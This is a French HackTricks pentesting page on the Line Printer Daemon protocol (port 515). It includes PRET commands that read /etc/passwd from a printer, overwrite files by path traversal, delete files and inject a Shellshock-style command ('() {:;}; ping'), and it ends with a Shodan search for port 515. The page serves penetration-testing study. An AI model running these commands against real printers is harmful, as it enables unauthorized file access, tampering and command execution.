3.8 KiB
Apprenez le piratage AWS de zéro à héros avec htARTE (HackTricks AWS Red Team Expert)!
Autres moyens de soutenir HackTricks :
- Si vous souhaitez voir votre entreprise annoncée dans HackTricks ou télécharger HackTricks en PDF, consultez les PLANS D'ABONNEMENT!
- Obtenez le merchandising officiel PEASS & HackTricks
- Découvrez La Famille PEASS, notre collection d'NFTs exclusifs
- Rejoignez le 💬 groupe Discord ou le groupe telegram ou suivez-moi sur Twitter 🐦 @carlospolopm.
- Partagez vos astuces de piratage en soumettant des PR aux dépôts github HackTricks et HackTricks Cloud.
Le protocole Line Printer Daemon (LPD) a été initialement introduit dans Berkeley Unix dans les années 80 (plus tard spécifié par le RFC1179).
Le démon s'exécute sur le port 515/tcp et peut être accédé en utilisant la commande lpr
. Pour imprimer, le client envoie un fichier de contrôle définissant le travail/nom d'utilisateur et un fichier de données contenant les données réelles à imprimer. Le type d'entrée du fichier de données peut être défini dans le fichier de contrôle en choisissant parmi divers formats de fichiers. Cependant, c'est à l'implémentation LPD de décider comment gérer réellement les données d'impression. Une implémentation LPD populaire pour les systèmes d'exploitation de type Unix est LPRng. LPD peut être utilisé comme vecteur pour déployer des travaux d'impression PostScript malveillants ou PJL.
Les outils lpdprint
et lpdtest
sont inclus dans PRET. Ils constituent un moyen minimaliste d'imprimer des données directement sur une imprimante compatible LPD ou de télécharger/supprimer des fichiers et plus encore :
lpdprint.py hostname filename
lpdtest.py hostname get /etc/passwd
lpdtest.py hostname put ../../etc/passwd
lpdtest.py hostname rm /some/file/on/printer
lpdtest.py hostname in '() {:;}; ping -c1 1.2.3.4'
lpdtest.py hostname mail lpdtest@mailhost.local
Si vous voulez en savoir plus sur le hacking des imprimantes, lisez cette page.
Shodan
port 515
Apprenez le hacking AWS de zéro à héros avec htARTE (HackTricks AWS Red Team Expert)!
Autres moyens de soutenir HackTricks :
- Si vous souhaitez voir votre entreprise annoncée dans HackTricks ou télécharger HackTricks en PDF, consultez les PLANS D'ABONNEMENT!
- Obtenez le merchandising officiel PEASS & HackTricks
- Découvrez La Famille PEASS, notre collection d'NFTs exclusifs
- Rejoignez le 💬 groupe Discord ou le groupe Telegram ou suivez-moi sur Twitter 🐦 @carlospolopm.
- Partagez vos astuces de hacking en soumettant des PR aux dépôts github HackTricks et HackTricks Cloud.